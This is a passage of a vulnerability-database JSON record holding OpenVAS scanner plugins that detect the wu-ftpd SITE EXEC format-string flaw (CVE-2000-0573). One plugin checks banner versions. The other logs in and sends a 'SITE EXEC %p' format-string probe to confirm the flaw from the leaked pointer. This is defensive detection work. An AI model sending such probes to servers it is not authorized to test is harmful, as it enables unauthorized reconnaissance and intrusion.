de Bernis\");\n script_dependencies(\"gb_wu-ftpd_detect.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"wu-ftpd/installed\");\n\n script_tag(name:\"summary\", value:\"The remote FTP server does not properly sanitize the argument of\n the SITE EXEC command.\");\n\n script_tag(name:\"impact\", value:\"It may be possible for a remote attacker to gain root access.\");\n\n script_tag(name:\"solution\", value:\"Upgrade your wu-ftpd server (<= 2.6.0 are vulnerable)\n or disable any access from untrusted users (especially anonymous).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( egrep( pattern:\"^((1\\..*)|(2\\.[0-5]\\..*)|(2\\.6\\.0))\", string: vers ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"2.6.1\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:10:07", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0997", "CVE-2000-0573"], "description": "The remote FTP server does not properly sanitize the argument of\nthe SITE EXEC command.\nIt may be possible for a remote attacker\nto gain root access.", "modified": "2017-04-28T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:10452", "href": "http://plugins.openvas.org/nasl.php?oid=10452", "type": "openvas", "title": "wu-ftpd SITE EXEC vulnerability", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: wu_ftpd_site_exec.nasl 6046 2017-04-28 09:02:54Z teissa $\n# Description: wu-ftpd SITE EXEC vulnerability\n#\n# Authors:\n# Alexis de Bernis <alexisb@nessus.org>\n# changes by rd :\n# - rely on the banner if we could not log in\n# - 
changed the description to include a Solution:\n#\n# Copyright:\n# Copyright (C) 2000 A. de Bernis\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote FTP server does not properly sanitize the argument of\nthe SITE EXEC command.\nIt may be possible for a remote attacker\nto gain root access.\";\n\ntag_solution = \"Upgrade your wu-ftpd server (<= 2.6.0 are vulnerable)\nor disable any access from untrusted users (especially anonymous).\";\n\nif(description)\n{\n script_id(10452);\n script_version(\"$Revision: 6046 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-28 11:02:54 +0200 (Fri, 28 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(1387, 2240, 726);\n script_xref(name:\"IAVA\", value:\"2000-a-0004\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2000-0573\", \"CVE-1999-0997\");\n \n name = \"wu-ftpd SITE EXEC vulnerability\";\n \n script_name(name);\n \n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"FTP\");\n\n \n script_copyright(\"This script is Copyright (C) 2000 A. 
de Bernis\");\n \n script_dependencies(\"find_service.nasl\", \"secpod_ftp_anonymous.nasl\",\n \"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_require_keys(\"ftp/wuftpd\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here : \n#\n\ninclude(\"ftp_func.inc\");\n\nlogin = get_kb_item(\"ftp/login\");\npass = get_kb_item(\"ftp/password\");\n\n\n\nport = get_kb_item(\"Services/ftp\");\nif(!port)port = 21;\nif(!get_port_state(port))exit(0);\n\n\n# Connect to the FTP server\nsoc = open_sock_tcp(port);\nftpport = port;\nif(soc)\n{\n if(login)\n {\n if(ftp_authenticate(socket:soc, user:login, pass:pass))\n {\n # We are in\n c = string(\"SITE EXEC %p \\r\\n\");\n send(socket:soc, data:c);\n b = recv(socket:soc, length:6);\n if(b == \"200-0x\") security_message(ftpport);\n quit = string(\"QUIT\\r\\n\");\n send(socket:soc, data:quit);\n r = ftp_recv_line(socket:soc);\n close(soc);\n exit(0);\n }\n else {\n \tclose(soc);\n\tsoc = open_sock_tcp(ftpport);\n\t}\n }\n if(!soc)soc = open_sock_tcp(ftpport);\n if(!soc)exit(0);\n r = ftp_recv_line(socket:soc);\n close(soc);\n if(egrep(pattern:\"220.*FTP server.*[vV]ersion wu-((1\\..*)|(2\\.[0-5]\\..*)|(2\\.6\\.0)).*\",\n \t string:r)){\n\t data = string(\n\"You are running a version of wu-ftpd which is older or\\n\",\n\"as old as version 2.6.0.\\n\",\n\"These versions do not sanitize the user input properly\\n\",\n\"and allow an intruder to execute arbitrary code through\\n\",\n\"the command SITE EXEC.\\n\\n\",\n\"*** OpenVAS did not log into this server\\n\",\n\"*** so it could not determine whether the option SITE\\n\",\n\"*** EXEC was activated or not, so this message may be\\n\",\n\"*** a false positive\\n\\n\",\n\"Solution: upgrade to wu-ftpd 2.6.1\");\n\t security_message(port:ftpport, data:data);\n\t }\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}